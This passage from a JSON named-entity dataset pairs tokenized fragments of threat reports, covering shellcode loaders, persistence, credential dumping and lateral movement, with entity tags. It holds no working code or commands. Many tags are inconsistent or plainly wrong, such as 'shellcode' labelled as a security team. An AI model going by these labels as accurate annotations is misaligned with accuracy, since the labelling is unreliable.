"O", "O", "O", "I-SecTeam", "O" ] }, { "tokens": [ "which", "will", "then", "send", "the", "results", "to", "the", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "SSL", "can", "be", "used", "to", "complicate", "command-and-control", "(C2)", "traffic", "analysis" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "replacing", "an", "early", "call", "instruction", "to", "their", "malicious", "code,", "or", "by", "overwriting", "the", "entry", "point", "in", "the", "PE", "header" ], "ner_tags": [ "B-Way", "O", "I-Way", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "unpack", "any", "additional", "payloads," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "HTTPS", "and", "other", "protocols", "built", "on", "SSL", "have" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "service", "using", "HTTPS" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "SSL", "encrypted", "traffic" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "TLS", "encrypted", "data" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "detect", "when", "TLS", "connections", "are", "being", "initiated", "and", "log", "the", "symmetric", "keys", "generated", "for", "the", "SSL/TLS", "connection" ], "ner_tags": [ "O", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "decrypt", "TLS", "traffic," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypt", "network", "traffic" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypted" ], "ner_tags": [ "O" ] }, { "tokens": [ "the", "decrypted", "HTTPS", "traffic." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "encrypt" ], "ner_tags": [ "O" ] }, { "tokens": [ "SSL", "encrypted", "traffic" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "TLS", "encrypted", "data" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "downloads", "the", "next", "stage", "from", "a", "public", "file", "storage", "service" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "embeds", "the", "next", "stages", "of", "the", "execution", "inside", "an", "additional", "file,", "usually", "an", "XML", "or", "a", "PDF", "file." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "B-Tool", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "that", "embeds", "the", "Crypter", "with", "the", "payload." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "actor", "embeds", "the", "malicious", "code", "inside", "different", "legitimate", "codes." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "enables", "an", "HTTPS", "connection." ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Once", "downloaded", "and", "executed,", "the", "malicious", "installer", "copies", "its", "compressed", "files", "into", "a", "newly", "created", "folder", "with", "a", "legitimate-looking", "name", "(i.e.,", "IIS", "Application", "Health", "Monitor)", "in", "one", "of", "the", "following", "directory", "paths:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "At", "first", "glance,", "the", "files", "within", "the", "directory", "may", "seem", "legitimate" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Write", "a", "registry", "Run", "key" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Write", "a.lnk", "file", "in", "the", "startup", "folder" ], "ner_tags": [ "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "registry", "run", "key", "persistence", "implementation" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Decryption", "Shellcode" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "Decryption", "shellcode", "has", "three", "main", "tasks:", "first,", "it", "extracts", "the", "Loader", "shellcode", "and", "the", "payload,", "then", "it", "decrypts", "them,", "and", "finally,", "it", "transfers", "the", "execution", "to", "the", "decrypted", "Loader", "shellcode." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Decryption", "shellcode", "execution", "flow" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "Decryption", "shellcode" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypts", "it", "using", "the", "denoted", "decryption", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "the", "decrypted", "payload", "address" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "An", "encrypted", "additional", "shellcode" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "An", "encrypted", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "these", "are", "encrypted", "and", "split", "inside", "the", "XML." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "user", "will", "be", "encouraged", "to", "download", "a", "malicious", "installer" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "deceive", "the", "user", "into", "thinking", "that", "the", "application", "has", "failed", "to", "execute,", "even", "as", "it", "silently", "continues", "the", "malicious", "execution", "in", "the", "background." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "shellcode", "is", "to", "inject", "the", "decrypted", "payload", "within", "the", "currently", "running", "process", "(itself)." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Loader", "overwrites", "the", "current", "PE", "with", "the", "final", "payload’s", "PE" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "It", "does", "so", "by", "copying", "the", "PE", "headers", "and", "each", "section", "according", "to", "the", "current", "executable’s", "base", "address." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "Loader", "copies", "the", "new", "PE", "headers", "to", "the", "base", "address", "and", "each", "section", "to", "the", "relevant", "location", "according", "to", "the", "IMAGE_SECTION_HEADER" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "the", "import", "address", "table", "and", "relocation", "table", "of", "the", "newly", "injected", "PE." ], "ner_tags": [ "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "newly", "injected", "PE" ], "ner_tags": [ "O", "O", "O", "B-Tool" ] }, { "tokens": [ "Loader", "removes", "evidence", "of", "injection", "by", "using", "the", "following", "methods:", "Update", "the", "LDR", "data", "table", "entry", "to", "match", "the", "injected", "PE.", "Remove", "the", "injected", "PE", "headers", "from", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "disable", "system", "defenses" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "process", "list", "checked", "is", "as", "follows" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "services", "running", "on", "the", "compromised", "system", "are", "checked", "against", "the", "following", "list" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "credentials", "also", "allow", "BlackCat", "to", "move", "laterally", "within", "the", "victim’s", "system", "and/or", "network,", "often", "with", "administrative", "privileges." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "ransomware", "to", "deploy", "additional", "tools" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "such", "as", "Mimikatz" ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "utilizes", "a", "unique", "onion", "domain" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Encrypted", "Multi-Hop", "Proxies" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "use", "the", "VPS", "as", "well", "as", "small", "office", "and", "home", "office", "(SOHO)", "devices", "as", "operational", "nodes", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "have", "been", "routinely", "observed", "using", "a", "VPS", "as", "an", "encrypted", "proxy." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "of", "these", "nodes", "operate", "as", "part", "of", "an", "encrypted", "proxy", "service", "to", "prevent", "attribution", "by", "concealing", "their", "country", "of", "origin", "and", "TTPs" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "have", "been", "observed", "using", "a", "network", "of", "VPSs", "and", "small", "office", "and", "home", "office", "(SOHO)", "routers", "as", "part", "of", "their", "operational", "infrastructure", "to", "evade", "detection", "and", "host", "C2", "activity" ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "locate", "certain", "files,", "paths," ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "have", "been", "observed", "using", "multiple", "implants", "with", "file", "system", "enumeration", "and", "traversal", "capabilities." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IP", "address", "space" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "have", "exploited", "known", "vulnerabilities", "in", "Internet-facing", "systems" ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exploit", "targeting", "a", "public-facing", "appliance", "vulnerability." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Exploiting", "Internet", "accessible", "webservers", "using", "webshell", "small", "code", "injections", "against", "multiple", "code", "languages,", "including", "net,", "asp,", "apsx,", "php,", "japx,", "and", "cfm." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O" ] }, { "tokens": [ "These", "emails", "may", "contain", "a", "malicious", "link", "or", "files", "that", "will", "provide", "the", "cyber", "actor", "access", "to", "the", "victim’s", "device" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "emails", "may", "contain", "a", "malicious", "link", "or", "file", "that", "provide", "the", "cyber", "actor", "access", "to", "the", "victim’s", "device" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "after", "the", "user", "clicks", "on", "the", "malicious", "link", "or", "opens", "the", "attachment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "the", "user", "clicks", "on", "the", "malicious", "link", "or", "opens", "the", "attachment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "gaining", "credential", "access", "into", "victim", "networks", "by", "using", "legitimate,", "but", "compromised", "credentials", "to", "access", "OWA", "servers,", "corporate", "login", "portals,", "and", "victim", "networks." ], "ner_tags": [ "B-Purp", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "used", "valid", "accounts", "to", "log", "into", "a", "service", "specifically", "designed", "to", "accept", "remote", "connections," ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actor", "may", "then", "perform", "actions", "as", "the", "logged-on", "user." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "used", "valid", "accounts", "to", "log", "into", "a", "service", "specifically", "designed", "to", "accept", "remote", "connections," ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actor", "may", "then", "perform", "actions", "as", "the", "logged-on", "user." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "cmd.exe," ], "ner_tags": [ "O", "B-SamFile" ] }, { "tokens": [ "Windows", "Command", "Shell" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "or", "command", "line", "interface", "tools" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "executing", "malware", "shellcode", "and", "batch", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Employing", "Python", "scripts", "to", "exploit", "vulnerable", "servers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "used", "valid", "accounts", "to", "log", "into", "a", "service", "specifically", "designed", "to", "accept", "remote", "connections,", "such", "as", "telnet,", "SSH,", "RDP,", "and", "Virtual", "Network", "Computing", "(VNC)." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way" ] }, { "tokens": [ "cyber", "actors", "used", "valid", "accounts", "to", "log", "into", "a", "service", "specifically", "designed", "to", "accept", "remote", "connections,", "such", "as", "telnet,", "SSH,", "RDP,", "and", "Virtual", "Network", "Computing", "(VNC)." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way" ] }, { "tokens": [ "such", "as", "schtask", "or", "crontab", "to", "create", "and", "schedule", "tasks", "that", "enumerate", "victim", "devices", "and", "networks." ], "ner_tags": [ "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "establish", "new", "services", "to", "enable", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "have", "also", "been", "observed", "modifying", "group", "policies", "for", "password", "exploitation." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "B-Exp" ] }, { "tokens": [ "usage", "of", "Mimikatz" ], "ner_tags": [ "O", "O", "B-Way" ] }, { "tokens": [ "observed", "targeting", "the", "LSASS", "process", "or", "Active", "directory", "(NDST.DIT)", "for", "credential", "dumping." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Injecting", "into", "the", "rundll32.exe", "process", "to", "hide", "usage", "of", "Mimikatz,", "as", "well", "as", "injecting", "into", "a", "running", "legitimate", "explorer.exe", "process", "for", "lateral", "movement." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Using", "shellcode", "that", "injects", "implants", "into", "newly", "created", "instances", "of", "the", "Service", "Host", "process", "(svchost)" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "were", "observed", "using", "the", "7-Zip", "utility", "to", "unzip", "imported", "tools", "and", "malware", "files", "onto", "the", "victim", "device." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "have", "been", "observed", "deleting", "files", "using", "rm", "or", "del", "commands." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Org", "B-OffAct", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "were", "observed", "Base64", "encoding", "files", "and", "command", "strings", "to", "evade", "security", "measures." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "have", "been", "observed", "using", "Base-64", "encoded", "commands" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "were", "observed", "using", "Microsoft", "signed", "binaries,", "such", "as", "Rundll32,", "as", "a", "proxy", "to", "execute", "malicious", "payloads." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "have", "been", "observed", "using", "commands,", "including", "tasklist,", "jobs,", "ps,", "or", "taskmgr,", "to", "reveal", "the", "running", "processes", "on", "victim", "devices." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "B-Way", "B-Tool", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "also", "used", "on-premises", "Identity", "and", "Access", "Management", "(IdAM)", "and", "federation", "services", "in", "hybrid", "cloud", "environments", "in", "order", "to", "pivot", "to", "cloud", "resources." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "also", "used", "on-premises", "Identity", "and", "Access", "Management", "(IdAM)", "and", "federation", "services", "in", "hybrid", "cloud", "environments", "in", "order", "to", "pivot", "to", "cloud", "resources." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "used", "RDP" ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "B-Way" ] }, { "tokens": [ "cyber", "actors", "have", "been", "observed", "using", "the", "mv", "command", "to", "export", "files", "into", "a", "location" ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "a", "downloader", "that", "downloads", "and", "executes", "a", "payload" ], "ner_tags": [ "O", "B-Way", "O", "B-Features", "O", "B-Features", "I-Features", "I-Features" ] }, { "tokens": [ "cyber", "actors", "have", "been", "observed", "importing", "tools", "from", "GitHub", "or", "infected", "domains", "to", "victim", "networks" ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cyber", "actors", "used", "the", "Server", "Message", "Block", "(SMB)", "protocol", "to", "import", "tools", "into", "victim", "networks." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "also", "tries", "to", "delete", "the", "wp-sale.js", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "obfuscated", "PHP", "code", "(again", "using", "character", "code", "obfuscation):" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "heavily", "obfuscated", "script" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "JavaScript", "code" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "When", "decoded" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "When", "decoded,", "a", "backdoor", "is", "revealed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sent", "as", "a", "POST", "request" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "backdoor", "executes", "arbitrary", "PHP", "code", "sent", "in", "POST", "request", "parameters." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "actors", "disable", "antivirus", "software" ], "ner_tags": [ "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "deactivated", "antivirus", "protocols" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "after", "receiving", "phishing", "emails", "containing", "malicious", "PDF", "documents", "[T" ], "ner_tags": [ "O", "O", "B-Way", "I-Way", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "for", "initial", "access", "is", "RDP", "compromise." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "actors", "often", "use", "RDP", "to", "move", "laterally", "across", "the", "network" ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "multiple", "tools" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "actors", "gain", "initial", "access", "through", "exploiting", "public-facing", "applications" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PsExec", "has", "also", "been", "used", "to", "aid", "lateral", "movement" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features" ] }, { "tokens": [ "actors", "used", "a", "legitimate", "admin", "account", "to", "remotely", "log", "on", "to", "the", "domain", "controller" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "by", "modifying", "Group", "Policy", "Objects" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "force", "a", "group", "policy", "update" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "delete", "files", "upon", "completion—including" ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "numerous", "batch", "(.bat)", "files", "on", "impacted", "systems" ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Batch", "files", "create", "a", "new", "admin", "user" ], "ner_tags": [ "B-SamFile", "I-SamFile", "I-Features", "I-Features", "O", "B-HackOrg", "B-Features" ] }, { "tokens": [ "which", "are", "typically", "transferred", "as", "an", "encrypted", "7zip", "file." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "strings", "are", "passed", "to", "a", "decoding", "function", "where", "they", "are", "converted", "from", "hex", "to", "byte", "and", "XOR’d", "with", "decimal", "18." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "decoded", "strings" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Once", "decoded" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Base64", "decodes", "the", "payload", "content" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "to", "decode", "the", "second", "buffer", "using", "key", "58", "3E", "88", "D0" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decoded", "by", "Shellcode" ], "ner_tags": [ "O", "O", "B-SecTeam" ] }, { "tokens": [ "These", "strings", "are", "passed", "to", "a", "de-obfuscation", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "de-obfuscation", "routine" ], "ner_tags": [ "B-Way", "B-SecTeam", "O" ] }, { "tokens": [ "this", "shellcode", "is", "responsible", "for", "fetching", "Remcos", "RAT" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "used", "to", "retrieve", "a", "payload", "package", "containing", "the", "second", "stage", "PowerShell", "and", "two", "shellcode", "buffers" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "retrieves", "a", "decoy", "tax", "document", "and", "VBS", "script." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "copying", "the", "current", "process", "command", "line", "as", "a", "new", "argument" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "full", "command", "line", "argument" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "a", "single", "payload", "package", "is", "retrieved", "that", "contains", "both", "the", "two-stage", "shellcode" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "highly", "obfuscated", "commands", "and", "encrypted", "shellcode." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "PowerShell", "command", "contains", "various", "obfuscated", "strings" ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "inject", "Remcos", "RAT", "into", "a", "legitimate", "Windows", "process", "such", "as", "ieinstal.exe." ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "injecting", "it", "into", "ieinstall.exe" ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile" ] }, { "tokens": [ "execution", "begins", "with", "the", "user", "clicking", "on", "a", "shortcut", "file" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "by", "the", "user", "clicking", "a", "shortcut", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "enticing", "users", "to", "click", "on", "malicious", "shortcut", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "checks", "if", "the", "system", "is", "64-bit" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "remote", "access", "and", "surveillance", "features" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "screenshots" ], "ner_tags": [ "O" ] }, { "tokens": [ "highly", "obfuscated", "and", "contains", "junk", "code", "to", "impede", "analysis." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "script", "concatenates", "hundreds", "of", "smaller", "strings", "into", "a", "single", "variable", "which", "ultimately", "builds", "and", "executes" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "payload", "would", "then", "be", "decrypted", "through", "XOR" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "use", "a", "set", "of", "tools", "via", "remote", "desktop" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "ransomware", "drops", "a", "batch", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "steal", "system", "information", "like", "machine", "details" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "payload", "most", "likely", "arrives", "by", "exploiting", "public-facing", "websites", "and", "domains." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "targeted", 